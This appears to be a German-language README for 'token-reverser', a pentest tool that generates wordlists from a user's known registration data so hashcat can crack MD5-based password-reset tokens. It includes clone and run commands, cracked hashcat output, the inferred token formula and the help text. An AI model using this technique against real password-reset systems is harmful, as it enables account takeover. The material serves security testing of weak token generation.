
Wörterlistengenerator zum Knacken von Sicherheitstoken
Wortlistengenerator zum Knacken von Sicherheitstoken.
$ git clone https://github.com/dariusztytko/token-reverser.git
Sie testen die Funktion zum Zurücksetzen des Passworts
Das Token zum Zurücksetzen des Passworts wurde an Ihre E-Mail-Adresse gesendet (z.B. 582431d4c7b57cb4a3570041ffeb7e10)
Sie vermuten, dass es sich um einen md5-Hash der bei der Registrierung angegebenen Daten handelt
Bei der Registrierung haben Sie folgende Daten eingegeben:
Zusätzlich haben Sie Zugriff auf die folgenden zusätzlichen Daten:
Verwenden Sie Token Reverser, um aus den bekannten Daten eine Wortliste zu generieren:
python3 token-reverser.py --date "Tue, 10 Mar 2020 17:12:59 GMT" Foo Bar [email protected] 1985-05-23 202-555-0185 "3634 Forest Drive" 74824 > words
Verwenden Sie hashcat, um das Token zum Zurücksetzen des Passworts zu knacken:
hashcat64.exe -m 0 582431d4c7b57cb4a3570041ffeb7e10 words
hashcat (v5.1.0) starting...
[...]
582431d4c7b57cb4a3570041ffeb7e10:[email protected]!1583860379
Session..........: hashcat
Status...........: Cracked
Hash.Type........: MD5
Hash.Target......: 582431d4c7b57cb4a3570041ffeb7e10
[...]
Jetzt wissen Sie, dass die Token zum Zurücksetzen des Passworts wie folgt generiert werden:
md5(user ID!first name!last name!email!current timestamp)
usage: token-reverser.py [-h] [-d DATE] [-o TIMESTAMP_OFFSET] [-s SEPARATORS]
data [data ...]
Wortlistengenerator zum Knacken von Sicherheitstoken v1.2
positional arguments:
data Datenblöcke
optional arguments:
-h, --help Zeigt diese Hilfemeldung an und beendet das Programm
-d DATE, --date DATE Zeitstempel von diesem Datum wird als zusätzlicher
Datenblock verwendet, Beispiel: Tue, 10 Mar 2020 14:06:36 GMT
-o TIMESTAMP_OFFSET, --timestamp-offset TIMESTAMP_OFFSET
Wie viele vorherige (zum Zeitstempel vom Datum) Zeitstempel
als zusätzliche Datenblöcke verwendet werden sollen, Standard: 1
-s SEPARATORS, --separators SEPARATORS
Trennzeichen für Datenblöcke, die überprüft werden sollen,
Standard: ~`!@#$%^&*()_+-={}|[]\:";'<>?,./ \t
Siehe CHANGELOG